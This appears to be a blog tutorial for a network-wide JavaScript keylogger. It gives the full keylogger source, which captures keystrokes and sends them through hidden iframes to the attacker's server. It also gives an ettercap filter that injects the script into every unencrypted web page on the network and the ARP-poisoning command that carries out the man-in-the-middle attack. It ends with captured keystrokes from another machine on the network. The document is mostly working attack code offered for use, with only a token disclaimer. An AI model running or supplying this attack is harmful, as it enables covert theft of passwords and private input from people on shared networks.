Table of Contents
Javascript Keylogger
Download
k_log_js.zip 2kb
Introduction
Okay, so, up above I've included all the source files necessary for this tutorial. I made this for fun; because I think it's a neat trick. Don't use it to indiscriminately steal people's information.
Basically we're going to host the files 'k.php' and 'k.js' on our own web server and use a MITM attack with ettercap to inject references to 'k.js' in every non-encrypted web page that passes through the network. 'k.js' simply captures keystrokes and sends them back to 'k.php' where they're stored neatly in a database. For this step-by-step I'll assume you're using Ubuntu 12.04 (because it's what I'm using). If you're not using that, you should still be able to make this all work rather easily.
I'm going to assume that you already know how to set up a web server and have one up and running. If not try googling 'xampp'.
Let's get started:
Step 1 :: Install SQLite3
sudo apt-get install php5-sqlite
Step 2 :: Copy the contents of k_log_js to the root of your webserver
ls /var/www/ > AUTHOR k.filter k.js k.php k.sql
Step 3 :: Edit any server references and replace them with your own address
source of k.js
var url='http://192.168.1.83'; //Replace this line
//Frames are inserted into the page for communication with our remote server. This avoids most security measures.
function makeFrame(addr,data) {
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", addr+data);
ifrm.style.width = 1+"px";
ifrm.style.height = 1+"px";
document.body.appendChild(ifrm);
}
function keyHandler(e)
{
var pressedKey;
pressedKey = e.charCode || e.keyCode;
pressedCharacter = String.fromCharCode(pressedKey);
keyGlobal = keyGlobal+pressedCharacter;
//Send our data whenever the buffer contains 4 characters or the user presses enter
if(keyGlobal.length >= 4 || pressedKey == 13)
{
makeFrame(url+'/k.php?k=',keyGlobal);
keyGlobal = '';
}
}
//our keystroke buffer
var keyGlobal = '';
document.onkeypress = keyHandler;
Step 4 :: Set up our database
touch k.db
sqlite3 k.db
sqlite> .read k.sql
Step 5 :: Install libnet and ettercap
I compiled them from source.
I've included the files here out of the goodness of my heart. libnet-1.1.6.tar.gz ettercap-0.7.4.1.tar.gz
sudo apt-get install flex sudo apt-get install bison
tar xvzf libnet-1.1.6.tar.gz cd libnet-1.1.6 ./configure --prefix=/usr/ && make make install cd .. tar xvzf ettercap-0.7.4.1.tar.gz cd ettercap-0.7.4.1.tar.gz ./configure make && make install
Step 6 :: Edit our etterfilter
this will alter any http traffic with references to k.js
k.filter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Derpde-Herpderp");
}
}
//alter src='' to your own server address
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head> <script src='http://192.168.1.83/k.js'></script> ");
replace("<input", "<input onkeypress=keyHandler(e) ");
}
Step 7 :: Compile the etterfilter
etterfilter k.filter -o k.ef
Step 8 :: Start ARP Poisoning the network and load our filter
sudo ettercap -T -q -F k.ef -M ARP // // >Listening on eth0... (Ethernet) eth0 -> 08:00:27:57:45:1D 192.168.1.83 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... 0 plugins (disabled by configure...) 40 protocol dissectors 55 ports monitored 7587 mac vendor fingerprint 1766 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 8 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing...
That's it. Now let's test it out. I visit facebook.com and check the page source. Sure enough; our script reference is there:
Then I type something in the search bar:
I open the database with the sqlite3 viewer and, sure enough, the keystrokes have been recorded. And note that the IP address is 192.168.1.89 while my server is running at 192.168.1.83. I was able to capture remotely. :)
sqlite3 k.db sqlite> select * from k_log; 2012-10-21 21:29:25|192.168.1.89|hSea 2012-10-21 21:29:26|192.168.1.89|rchi 2012-10-21 21:29:27|192.168.1.89|ng f 2012-10-21 21:29:27|192.168.1.89|or t 2012-10-21 21:29:28|192.168.1.89|hing 2012-10-21 21:29:29|192.168.1.89|s...
Comments
